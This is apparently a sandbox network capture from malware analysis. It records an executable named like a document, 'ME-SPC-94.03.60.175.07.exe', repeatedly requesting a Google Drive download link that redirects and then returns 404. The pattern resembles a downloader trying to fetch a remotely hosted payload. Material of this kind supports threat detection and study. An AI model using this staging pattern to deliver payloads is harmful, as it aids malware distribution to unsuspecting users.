                                                Content-Security-Policy: script-src 'nonce-unb7a40A_XHPKEdcYKqwdw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                Content-Length: 1652
                                                Server: UploadServer
                                                Set-Cookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W; expires=Tue, 17-Jun-2025 17:05:46 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Content-Security-Policy: sandbox allow-scripts
                                                Connection: close
                                                2024-12-16 17:05:47 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 63 41 59 49 43 72 36 4a 43 5f 6c 41 42 30 47 68 58 63 6b 50 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fcAYICr6JC_lAB0GhXckPg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.749789172.217.19.1744435064C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-16 17:05:58 UTC418OUTGET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Host: drive.google.com
                                                Cache-Control: no-cache
                                                Cookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
                                                2024-12-16 17:05:59 UTC1920INHTTP/1.1 303 See Other
                                                Content-Type: application/binary
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Mon, 16 Dec 2024 17:05:59 GMT
                                                Location: https://drive.usercontent.google.com/download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download
                                                Strict-Transport-Security: max-age=31536000
                                                Cross-Origin-Opener-Policy: same-origin
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                Content-Security-Policy: script-src 'nonce-uBi_aIYx94XCDDFF3xHaZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                Server: ESF
                                                Content-Length: 0
                                                X-XSS-Protection: 0
                                                X-Frame-Options: SAMEORIGIN
                                                X-Content-Type-Options: nosniff
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Connection: close


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                3192.168.2.749796142.250.181.14435064C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-16 17:06:01 UTC460OUTGET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Cache-Control: no-cache
                                                Host: drive.usercontent.google.com
                                                Connection: Keep-Alive
                                                Cookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
                                                2024-12-16 17:06:02 UTC1844INHTTP/1.1 404 Not Found
                                                X-GUploader-UploadID: AFiumC5AtbLVvDemcsOze4UxWAJswKKU1OOMjEFkiL9uXjR3uk8jeFJCbQcre-BIKMhLeRda
                                                Content-Type: text/html; charset=utf-8
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Mon, 16 Dec 2024 17:06:02 GMT
                                                Cross-Origin-Opener-Policy: same-origin
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                Content-Security-Policy: script-src 'nonce-J99k5bv_o8rfN7NTLMxwag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                Content-Length: 1652
                                                Server: UploadServer
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Content-Security-Policy: sandbox allow-scripts
                                                Connection: close
                                                2024-12-16 17:06:02 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 65 33 61 4a 45 51 43 5a 6e 6d 6a 51 6c 31 63 78 6c 2d 74 64 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9e3aJEQCZnmjQl1cxl-tdQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                4192.168.2.749823172.217.19.1744435064C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-16 17:06:15 UTC418OUTGET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Host: drive.google.com
                                                Cache-Control: no-cache
                                                Cookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
                                                2024-12-16 17:06:15 UTC1920INHTTP/1.1 303 See Other
                                                Content-Type: application/binary
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Mon, 16 Dec 2024 17:06:15 GMT
                                                Location: https://drive.usercontent.google.com/download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download
                                                Strict-Transport-Security: max-age=31536000
                                                Cross-Origin-Opener-Policy: same-origin
                                                Content-Security-Policy: script-src 'nonce-FNZ71Kg20dzkieMUq-r4PA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                Server: ESF
                                                Content-Length: 0
                                                X-XSS-Protection: 0
                                                X-Frame-Options: SAMEORIGIN
                                                X-Content-Type-Options: nosniff
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Connection: close


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                5192.168.2.749831142.250.181.14435064C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-16 17:06:17 UTC460OUTGET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Cache-Control: no-cache
                                                Host: drive.usercontent.google.com
                                                Connection: Keep-Alive
                                                Cookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
                                                2024-12-16 17:06:18 UTC1844INHTTP/1.1 404 Not Found
                                                X-GUploader-UploadID: AFiumC6bPUQknQJR2dLSk1W3xO3cIl_Fhp_FPTg82L3MoHt6MutCEPb0gmAsZ5n-WstE5dvr
                                                Content-Type: text/html; charset=utf-8
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Mon, 16 Dec 2024 17:06:18 GMT
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                Cross-Origin-Opener-Policy: same-origin
                                                Content-Security-Policy: script-src 'nonce-8lSpDq0z_xTdjpSMhC5onw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                Content-Length: 1652
                                                Server: UploadServer
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Content-Security-Policy: sandbox allow-scripts
                                                Connection: close
                                                2024-12-16 17:06:18 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2d 46 55 4a 47 66 58 59 57 32 56 78 4a 4e 6f 79 52 43 68 71 6f 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="-FUJGfXYW2VxJNoyRChqoQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                6192.168.2.749859172.217.19.1744435064C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-16 17:06:31 UTC418OUTGET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Host: drive.google.com
                                                Cache-Control: no-cache
                                                Cookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
                                                2024-12-16 17:06:31 UTC1920INHTTP/1.1 303 See Other
                                                Content-Type: application/binary
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Mon, 16 Dec 2024 17:06:31 GMT
                                                Location: https://drive.usercontent.google.com/download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download
                                                Strict-Transport-Security: max-age=31536000
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                Cross-Origin-Opener-Policy: same-origin
                                                Content-Security-Policy: script-src 'nonce-VOad-AKJIsFpwIl_itwx9Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                Server: ESF
                                                Content-Length: 0
                                                X-XSS-Protection: 0
                                                X-Frame-Options: SAMEORIGIN
                                                X-Content-Type-Options: nosniff
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Connection: close


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                7192.168.2.749865142.250.181.14435064C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-16 17:06:33 UTC460OUTGET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Cache-Control: no-cache
                                                Host: drive.usercontent.google.com
                                                Connection: Keep-Alive
                                                Cookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
                                                2024-12-16 17:06:34 UTC1844INHTTP/1.1 404 Not Found
                                                X-GUploader-UploadID: AFiumC41YOb0Gp3cWeY4Rv6wZr2KfNwO8cRr_GaxLXgZUWfKuXKeLUrKpQmvcZ0Ze-ZpUNWZ
                                                Content-Type: text/html; charset=utf-8
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Mon, 16 Dec 2024 17:06:34 GMT
                                                Cross-Origin-Opener-Policy: same-origin
                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                Content-Security-Policy: script-src 'nonce-HFAbTqJA7y5bm2pnrujFuA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                Content-Length: 1652
                                                Server: UploadServer
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Content-Security-Policy: sandbox allow-scripts
                                                Connection: close
                                                2024-12-16 17:06:34 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6e 32 48 6e 56 39 46 61 2d 63 32 43 6d 67 53 71 45 32 6e 47 41 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="n2HnV9Fa-c2CmgSqE2nGAA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                8192.168.2.749896172.217.19.1744435064C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-16 17:06:46 UTC418OUTGET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Host: drive.google.com
                                                Cache-Control: no-cache
                                                Cookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
                                                2024-12-16 17:06:47 UTC1920INHTTP/1.1 303 See Other
                                                Content-Type: application/binary
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Mon, 16 Dec 2024 17:06:47 GMT
                                                Location: https://drive.usercontent.google.com/download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download
                                                Strict-Transport-Security: max-age=31536000
                                                Cross-Origin-Opener-Policy: same-origin
                                                Content-Security-Policy: script-src 'nonce-OevyKIYfeM57nKq8hgUZBw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                Server: ESF
                                                Content-Length: 0
                                                X-XSS-Protection: 0
                                                X-Frame-Options: SAMEORIGIN
                                                X-Content-Type-Options: nosniff
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Connection: close


